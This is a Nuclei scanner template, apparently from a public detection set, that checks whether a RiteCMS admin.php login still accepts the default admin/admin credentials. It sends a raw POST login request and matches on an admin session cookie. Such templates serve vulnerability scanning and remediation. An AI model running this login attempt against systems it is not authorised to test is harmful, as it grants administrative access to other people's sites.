漏洞描述
RiteCMS accepts its default administrator credentials, so anyone who can reach the login page can sign in as admin.
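# Nuclei HTTP template: reports a RiteCMS install whose admin.php login still
# accepts the default credentials defined under `variables`.
id: ritecms-default-login

info:
  name: RiteCMS - Default Login
  author: 0x_Akoko
  severity: high
  description: |
    RiteCMS Default Credentials were discovered.
  # Guidance for whoever triages a finding from this template.
  remediation: |
    Change the default administrator password and limit who can reach admin.php.
  reference:
    - https://ritecms.com/
  metadata:
    verified: true
    # NOTE(review): two `path` payloads are listed below, so a scan can send up
    # to two requests per host - confirm this count.
    max-request: 1
    fofa-query: title="ritecms"
  tags: ritecms,default-login,vuln

# Credentials submitted by the login request below.
variables:
  username: "admin"
  password: "admin"

http:
  - raw:
      # The blank line separates the headers from the form body; without it
      # the credentials line would be read as a malformed header.
      - |
        POST {{path}}admin.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&userpw={{password}}

    # Base paths under which admin.php is tried.
    payloads:
      path:
        - "/"
        - "/ritecms/"

    # Stop after the first confirmed login so a host that already matched
    # does not receive a second default-credential attempt.
    stop-at-first-match: true

    # Both expressions must hold: the login answers with a 302 redirect, and
    # the Set-Cookie header carries both PHPSESSID and admin=true.
    matchers:
      - type: dsl
        dsl:
          - "status_code == 302"
          - "contains_all(set_cookie, 'PHPSESSID','admin=true')"
        condition: and

# NOTE(review): the digest trailer below was generated for the signed upstream
# text; re-sign the template after any edit or its signature will not verify.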
# digest: 4a0a0047304502206eb1c72501be77ac3b2fbaa87b5a2e412ff271410000d1ec93cdd543daf6d59f022100f41d8eea2dfdf862624d13480cc3421fd643e50269fc652f166d3285ee19dc33:922c64590222798bb761d5b6d8e72950